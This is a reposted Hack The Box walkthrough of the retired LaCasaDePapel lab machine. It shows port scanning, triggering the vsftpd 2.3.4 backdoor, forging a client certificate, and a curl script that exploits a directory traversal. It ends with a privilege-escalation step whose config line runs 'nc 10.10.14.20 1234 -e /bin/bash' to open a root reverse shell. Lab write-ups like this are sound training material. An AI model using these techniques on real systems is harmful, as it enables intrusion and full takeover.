LaCasaDePapel: Hack The Box Walkthrough
source link: https://www.tuicool.com/articles/RFzIre7
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
This post documents the complete walkthrough of LaCasaDePapel, a retired vulnerable VM created by thek , and hosted at Hack The Box . If you are uncomfortable with spoilers, please stop reading now.
Background
LaCasaDePapel is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan
probe to establish the open ports in the host.
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.131 --rate=500 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-04-05 07:58:16 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.131 Discovered open port 22/tcp on 10.10.10.131 Discovered open port 443/tcp on 10.10.10.131 Discovered open port 21/tcp on 10.10.10.131
masscan
finds several open ports. Let’s do one better with nmap
scanning the discovered ports to establish the services behind them.
# nmap -n -v -Pn -p21,22,80,443 -A --reason -oN nmap.txt 10.10.10.131 ... PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9 (protocol 2.0) | ssh-hostkey: | 2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA) | 256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA) |_ 256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519) 80/tcp open http syn-ack ttl 63 Node.js Express framework | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: La Casa De Papel 443/tcp open https? syn-ack ttl 63 | http-methods: |_ Supported Methods: POST OPTIONS
What do we have here? vsftpd 2.3.4 has a famous backdoor in 6200/tcp
.
VSFTPD v2.3.4 Backdoor Command Execution
It’s pretty trivial to initiate the backdoor. Any attempts to log in with a username ending with a smiley face :)
will trigger the backdoor to open. Once that’s done, simply nc 10.10.10.131 6200
.
Open the backdoor
Connect to the backdoor
We’ll leave the Psy Shell for a while and take a look at the http
and https
services.
80/tcp
443/tcp
Looks like I need to generate some kind of client certificate in order to access the https
service.
Generating a Client Certificate.
Back in our Psy Shell, check what’s in store for us.
Sure, we can generate a client certificate. If only we can find the CA certificate. Wait a tick, it’s a two-way SSL right? I can download or export a copy of CA certificate from the site.
Let’s hit that Export button to grab a copy of the so-called CA certificate. Ok, that was easy, what’s step two? We generate a certificate signing request (CSR) with openssl
.
Generate my own private key
Generate my certificate signing request
Awesome. We have all the ingredients ready to cook ourselves a client certificate. Now back to our Psy Shell.
…
We can base64_decode
our $caCert
and $useCsr
in the Psy Shell like so.
Do likewise for our CSR.
Repeat the steps listed in the private sign()
function.
Grab the CA key
Sign our client certificate
Export the client certificate
Copy the client certificate in the PEM format to my attacking machine and combine with the private key generated earlier to a PCKS#12 certificate format because that’s what Firefox accepts.
Import the client certificate to Firefox.
We can now access the https
service.
Directory Traversal Vulnerability
It’s not long before I spotted a directory traversal vulnerability with server.js
. Not only that, I can also download any file as berlin
.
Towards that end, I wrote a real simple bash
script to read any file as berlin
.
read.sh
#!/bin/bash URL=https://lacasadepapel.htb/file FILE=$(echo -n ../../..$1 | base64 -w0) curl -s \ -k \ --cert-type P12 \ -E me.p12 \ $URL/$FILE
Here's user.txt
.
Privilege Escalation
During enumeration of berlin
's account, I chanced upon the fact that berlin
’s SSH key pair is available for download.
Needless to say, I went ahead to download the key pair. Now, this is where I was stucked for a while. Who would have guessed that berlin
’s key can log in to professor
’s SSH account when you have no access to professor
's .ssh/authorized_keys
? Not unless you watch the TV show and know the relationship between Professor and Berlin.
Once you can obtain a shell as professor
, the rest is easy…
You’ll notice the presence of read-only file memcached.ini
in professor
’s home directory. Heck, it’s professor
’s turf right? He can remove any file and recreate his own!
echo y | rm memcached.ini; echo "[program:memcached]" > memcached.ini; echo "command = sudo /usr/bin/nc 10.10.14.20 1234 -e /bin/bash" >> memcached.ini
A minute later, a root shell pops up and the rest is history…
Afterthought
It doesn’t have to be memcached.ini
, you know. Any ini
file will do because of this.
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK